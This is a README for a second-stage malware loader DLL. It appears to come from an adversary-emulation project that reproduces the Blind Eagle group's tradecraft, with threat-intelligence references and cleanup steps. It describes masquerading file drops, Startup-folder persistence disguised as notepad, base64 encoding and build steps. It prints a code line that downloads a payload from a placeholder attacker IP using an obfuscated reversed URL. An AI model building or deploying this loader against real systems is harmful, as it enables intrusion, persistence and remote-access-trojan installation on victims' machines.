# Fiber DLL

# Overview

Fiber is a second stage loader that Blind Eagle has used in operations1,2. Fiber has three functions that it performs:

  1. Copies the VBS loader to C:\Windows\Temp and renames it OneDrive.vbs

  2. Downloads and executes the injector fsociety.dll

  3. Establishes userland persistence by creating an lnk file in the users Startup folder posing as notepad.exe

The VAI method of fiber.dll takes one argument, a URL. The URL is typically passed in obfuscated form from the first stage loader to fiber.dll. fiber.dll will unreverse the URL and replace junk characters with ones to form a proper URL. On the other end of the URL is the AsyncRAT payload (asy.txt).

# Usage

fiber.dll first needs to be encoded in base64. file-ops.py has a function for this and can be used as follows:


py.exe ./file-ops.py -b path\to\repo\birdsofprey\Resources\fiber\fiber\bin\Release\fiber.dll


python3 ./file-ops.py -b path/to/repobirdsofprey/Resources/fiber/fiber/bin/Release/fiber.dll

The URL on line 55 will also need to be updated prior to build with the IP address of the attacker server:

55               }.DownloadString(Strings.StrReverse("slx.pmuR/pmuR/<reverse-attacker-ip>//:ptth")); // http://<attacker-ip>/Rump/Rump.xls

# Build

Two build options are presented. The CLI can be used with devenv.exe to build the fiber.sln solution. Also instructions for the Visual Studio GUI are also included:


PS C:\<path>\<to>\birdsofprey\Resources\fiber> 'C:\Program Files | [x86]\Microsoft Visual Studio\<version>\<Professional|blank>\Common7\IDE\devenv.exe' fiber.sln /Build "Release"


  1. Open Solution in Visual Studio - this option is presented upon Visual Studio opening



  2. In the menu bar near the top of the window, change the dropdown from Debug to Release - this will build and remove any debugging assistance from the project:


  3. In the menu bar at the top of the window, select Build -> Build Solution. The completed executables will be located in birdsofprey\Resources\fiber\bin\Release


# Cleanup

  1. delete OneDrive.vbs from C:\Windows\Temp

  2. delete notepad.lnk from %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup

# References and CTI

  1. https://blogs.blackberry.com/en/2023/02/blind-eagle-apt-c-36-targets-colombia

  2. https://lab52.io/blog/apt-c-36-from-njrat-to-apt-c-36/